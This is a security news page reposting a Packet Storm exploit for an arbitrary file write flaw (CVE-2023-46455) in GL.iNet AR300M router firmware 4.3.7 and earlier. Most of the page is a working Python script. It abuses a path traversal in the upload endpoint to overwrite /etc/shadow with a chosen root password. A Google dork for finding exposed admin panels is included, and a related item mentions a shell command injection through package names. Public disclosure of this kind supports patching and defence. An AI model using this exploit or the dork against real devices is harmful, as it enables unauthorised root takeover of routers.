Security
Headlines
HeadlinesLatestCVEs

Headline

GL.iNet AR300M 4.3.7 Arbitrary File Write

GL.iNet AR300M versions 4.3.7 and below suffer from an arbitrary file writing vulnerability.

Packet Storm
#vulnerability#google#auth
#!/usr/bin/env python3# Exploit Title: GL.iNet <= 4.3.7 Arbitrary File Write# Google Dork: intitle:"GL.iNet Admin Panel"# Date: XX/11/2023# Exploit Author: Michele 'cyberaz0r' Di Bonaventura# Vendor Homepage: https://www.gli-net.com# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar# Version: 4.3.7# Tested on: GL.iNet AR300M# CVE: CVE-2023-46455import cryptimport requestsfrom sys import argvrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)def craft_shadow_file(salted_password):  shadow_content  = 'root:{}:19459:0:99999:7:::\n'.format(salted_password)  shadow_content += 'daemon:*:0:0:99999:7:::\n'  shadow_content += 'ftp:*:0:0:99999:7:::\n'  shadow_content += 'network:*:0:0:99999:7:::\n'  shadow_content += 'nobody:*:0:0:99999:7:::\n'  shadow_content += 'dnsmasq:x:0:0:99999:7:::\n'  shadow_content += 'stubby:x:0:0:99999:7:::\n'  shadow_content += 'ntp:x:0:0:99999:7::\n'  shadow_content += 'mosquitto:x:0:0:99999:7::\n'  shadow_content += 'logd:x:0:0:99999:7::\n'  shadow_content += 'ubus:x:0:0:99999:7::\n'  return shadow_contentdef replace_shadow_file(url, auth_token, shadow_content):  data = {    'sid': (None, auth_token),    'size': (None, '4'),    'path': (None, '/tmp/ovpn_upload/../../etc/shadow'),    'file': ('shadow', shadow_content)  }  requests.post(url, files=data, verify=False)def main(base_url, auth_token):  print('[+] Started GL.iNet <= 4.3.7 Arbitrary File Write exploit')  password = input('[?] New password for root user: ')  salted_password = crypt.crypt(password, salt=crypt.METHOD_MD5)  shadow_content = craft_shadow_file(salted_password)  print('[+] Crafted shadow file:\n{}'.format(shadow_content))  print('[*] Replacing shadow file with the crafted one')  replace_shadow_file(base_url+'/upload', auth_token, shadow_content)  print('[+] Done')if __name__ == '__main__':  if len(argv) < 3:    print('Usage: {} <TARGET_URL> <AUTH_TOKEN>'.format(argv[0]))    exit(1)  main(argv[1], argv[2])

Related news

CVE-2023-46454: cyberaz0r Security Blog | GL.iNet Multiple Vulnerabilities

In GL.iNET GL-AR300M routers with firmware v4.3.7, it is possible to inject arbitrary shell commands through a crafted package name in the package information functionality.

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution